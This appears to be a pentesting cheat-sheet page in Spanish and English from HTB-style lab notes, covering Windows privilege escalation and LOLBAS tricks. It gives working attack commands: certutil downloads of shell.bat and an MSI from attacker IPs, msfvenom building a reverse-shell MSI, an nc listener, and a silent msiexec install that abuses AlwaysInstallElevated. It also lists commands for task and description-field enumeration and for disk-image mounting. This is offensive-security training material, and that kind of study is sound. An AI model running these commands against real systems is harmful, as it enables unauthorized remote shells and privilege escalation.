Miscellaneous Techniques

LOLBAS

Binarios, scripts y librerías con funcionalidades inesperadas para un atacante.

Transferring File with Certutil

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

Encoding File with Certutil

certutil -encode file1 encodedfile

Decoding File with Certutil

certutil -decode encodedfile file2

Always Install Elevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generating MSI Package

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

Tranferir archivo

certutil.exe -urlcache -f http://10.10.15.52:8000/aie.msi aie.msi

Ponerse en escucha

nc -lnvp 1111

Executing MSI Package

msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Scheduled Tasks

Enumerating Scheduled Tasks

schtasks /query /fo LIST /v

Enumerating Scheduled Tasks with PowerShell

Get-ScheduledTask | select TaskName,State

User/Computer Description Field

Checking Local User Description Field

Get-LocalUser

Enumerating Computer Description Field with Get-WmiObject Cmdlet

Get-WmiObject -Class Win32_OperatingSystem | select Description

Mount VHDX/VMDK

Mount VMDK on Linux

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk

Mount VHD/VHDX on Linux

guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

PreviousLeveraging DnsAdmins Access NextOtros archivos

Last updated 3 months ago

hashtagLOLBAS

hashtagTransferring File with Certutil

hashtagEncoding File with Certutil

hashtagDecoding File with Certutil

hashtagAlways Install Elevated

hashtagGenerating MSI Package

hashtagTranferir archivo

hashtagPonerse en escucha

hashtagExecuting MSI Package

hashtagScheduled Tasks

hashtagEnumerating Scheduled Tasks

hashtagEnumerating Scheduled Tasks with PowerShell

hashtagUser/Computer Description Field

hashtagChecking Local User Description Field

hashtagEnumerating Computer Description Field with Get-WmiObject Cmdlet

hashtagMount VHDX/VMDK

hashtagMount VMDK on Linux

hashtagMount VHD/VHDX on Linux

LOLBAS

Transferring File with Certutil

Encoding File with Certutil

Decoding File with Certutil

Always Install Elevated

Generating MSI Package

Tranferir archivo

Ponerse en escucha

Executing MSI Package

Scheduled Tasks

Enumerating Scheduled Tasks

Enumerating Scheduled Tasks with PowerShell

User/Computer Description Field

Checking Local User Description Field

Enumerating Computer Description Field with Get-WmiObject Cmdlet

Mount VHDX/VMDK

Mount VMDK on Linux

Mount VHD/VHDX on Linux